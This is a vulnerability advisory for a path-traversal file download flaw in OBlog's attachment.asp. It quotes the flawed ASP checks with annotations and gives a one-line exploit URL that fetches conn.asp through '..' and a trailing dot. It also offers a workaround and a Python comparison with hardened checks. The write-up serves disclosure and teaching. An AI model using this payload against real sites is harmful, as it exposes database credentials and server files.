OBlog Arbitrary File Download Vulnerability

Path = Trim(Request("path")) ' Get the path submitted by the user
FileID = Trim(Request("FileID"))
If FileID = "" And Path = "" Then
    Response.Write "参数不足" ' "Insufficient parameters"
    Response.End
End If

...

If CheckDownLoad Or 1=1 Then
    If Path = "" Then
        Set rs = Server.CreateObject("ADODB.RecordSet")
        link_database
        SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID=" & CLng(FileID))
        rs.Open SQL, conn, 1, 3
        If Not rs.Eof Then
            uid = rs(1)
            file_ext = rs(2)
            rs("ViewNum") = rs("ViewNum") + 1
            rs.Update
            downloadFile Server.MapPath(rs(0)), 0
        Else
            Response.Status = 404
            Response.Write "该附件不存在!" ' "This attachment does not exist!"
        End If
        rs.Close
        Set rs = Nothing
    Else
        If InStr(path, Oblog.CacheConfig(56)) > 0 Then ' Tr4c3 note: look here, it only checks whether the user-submitted path contains UploadFiles; if so, it calls the downloadFile function to download the file
            downloadFile Server.MapPath(Path), 1
        End If
    End If
Else
    ' If the attachment is an image and the permission check fails, serve a default image so that the <img> tag does not break and spoil the display
    If Path = "" Then
        Response.Status = 403
        Response.Write ShowDownErr
        Response.End
    Else
        downloadFile Server.MapPath(blogdir & "images/oblog_powered.gif"), 1
    End If
End If
Set oblog = Nothing

Sub downloadFile(strFile, stype)
    On Error Resume Next
    Server.ScriptTimeOut = 9999999
    Dim S, fso, f, intFilelength, strFilename
    strFilename = strFile
    Response.Clear
    Set s = Server.CreateObject(oblog.CacheCompont(2))
    s.Open
    s.Type = 1
    Set fso = Server.CreateObject(oblog.CacheCompont(1))
    If Not fso.FileExists(strFilename) Then
        If stype = 0 Then
            Response.Status = 404
            Response.Write "该附件已经被删除!" ' "This attachment has been deleted!"
            Exit Sub
        Else
            strFilename = Server.MapPath(blogdir & "images/nopic.gif")
        End If
    End If
    Set f = fso.GetFile(strFilename)
    intFilelength = f.size
    s.LoadFromFile(strFilename)
    If Err Then
        Response.Write("<h1>错误:</h1>" & Err.Description & "<p>") ' "Error:"
        Response.End
    End If
    Set fso = Nothing
    Dim Data
    Data = s.Read
    s.Close
    Set s = Nothing
    Dim ContentType
    Select Case LCase(Right(strFile, 4))
        Case ".asp", ".mdb", ".config", ".js" ' Tr4c3 note: now look here, does it remind you of anything? Right, the arbitrary download vulnerability in the 沸腾展望 news system that I posted a few days ago uses much the same check [http://www.tr4c3.com/post/306.html], the exploitation method is similar too, and the magic "." comes in handy once again.
            Exit Sub
        Case ".asf"
            ContentType = "video/x-ms-asf"
        Case ".avi"
            ContentType = "video/avi"
        Case ".doc"
            ContentType = "application/msword"
        Case ".zip"
            ContentType = "application/zip"
        Case ".xls"
            ContentType = "application/vnd.ms-excel"
        Case ".gif"
            ContentType = "image/gif"
        Case ".jpg", "jpeg"
            ContentType = "image/jpeg"
        Case ".wav"
            ContentType = "audio/wav"
        Case ".mp3"
            ContentType = "audio/mpeg3"
        Case ".mpg", "mpeg"
            ContentType = "video/mpeg"
        Case ".rtf"
            ContentType = "application/rtf"
        Case ".htm", "html"
            ContentType = "text/html"
        Case ".txt"
            ContentType = "text/plain"
        Case Else
            ContentType = "application/octet-stream"
    End Select
    If Response.IsClientConnected Then
        ' Images are displayed inline; everything else is sent as an attachment
        If Not (InStr(LCase(f.name), ".gif") > 0 Or InStr(LCase(f.name), ".jpg") > 0 Or InStr(LCase(f.name), ".jpeg") > 0 Or InStr(LCase(f.name), ".bmp") > 0 Or InStr(LCase(f.name), ".png") > 0) Then
            Response.AddHeader "Content-Disposition", "attachment;filename=" & f.name
        End If
        Response.AddHeader "Content-Length", intFilelength
        Response.CharSet = "UTF-8"
        Response.ContentType = ContentType
        Response.BinaryWrite Data
        Response.Flush
        Response.Clear()
    End If
End Sub

<*Reference:

Tr4c3[at]126[dot]com

*>

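Test method:

[Warning]

The following program (method) may be offensive in nature and is intended only for security research and teaching. Use at your own risk!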

########################################################################

Exploitation method:

http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.

########################################################################

Recommendations:

Patch recommendation:

Wait for the vendor to release a new patch.

########################################################################

Temporary workaround:

In attachment.asp, change line 5 from Path=Trim(Request("path")) to Path=Replace(Trim(Request("path")),"..","")

########################################################################
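
An added Python example (not OBlog code and not from Tr4c3): it ports the two annotated checks and sets them beside a check made on the resolved file name, which is the name the substring test and the four-character suffix test never look at. SITE_ROOT, the allowlist and the photo.jpg request are assumptions; the trailing-dot handling models Windows file-name resolution.

```python
import ntpath

UPLOAD_DIR = "UploadFiles"   # the value the page gives for Oblog.CacheConfig(56)
BLOCKED = {".asp", ".mdb", ".config", ".js"}   # the first Case in downloadFile
# Assumed allowlist, drawn from the Content-Type table in downloadFile
ALLOWED = {".gif", ".jpg", ".jpeg", ".png", ".bmp", ".zip", ".doc", ".xls",
           ".rtf", ".txt", ".mp3", ".wav", ".avi", ".asf", ".mpg", ".mpeg"}
SITE_ROOT = "C:\\inetpub\\oblog"   # hypothetical root, stands in for Server.MapPath


def original_checks(path):
    """Port of the two annotated checks: substring test, then 4-char suffix test."""
    if UPLOAD_DIR not in path:                  # InStr(path, "UploadFiles") > 0
        return False
    return path[-4:].lower() not in BLOCKED     # LCase(Right(strFile, 4))


def resolve(path):
    """Model how the file system finally names the file (Win32 behaviour):
    '..' segments are collapsed and trailing dots/spaces are dropped."""
    full = ntpath.normpath(ntpath.join(SITE_ROOT, path.replace("/", "\\")))
    return full.rstrip(". ")


def hardened_checks(path):
    """Validate the resolved name, not the submitted string."""
    full = resolve(path)
    root = ntpath.join(SITE_ROOT, UPLOAD_DIR) + "\\"
    if not full.lower().startswith(root.lower()):   # must stay inside the upload dir
        return False
    return ntpath.splitext(full)[1].lower() in ALLOWED   # allowlist, not blocklist


# Constructed sample requests; the second is the path from the page's test URL.
SAMPLES = ["UploadFiles/2008/photo.jpg", "UploadFiles/../conn.asp."]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p!r:32} original={original_checks(p)!s:5} "
              f"hardened={hardened_checks(p)!s:5} resolves to {resolve(p)}")
```

The ".." replacement in the temporary workaround stops the traversal but leaves the suffix comparison as it is, so the extension decision is still made on the submitted string rather than on the resolved name.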
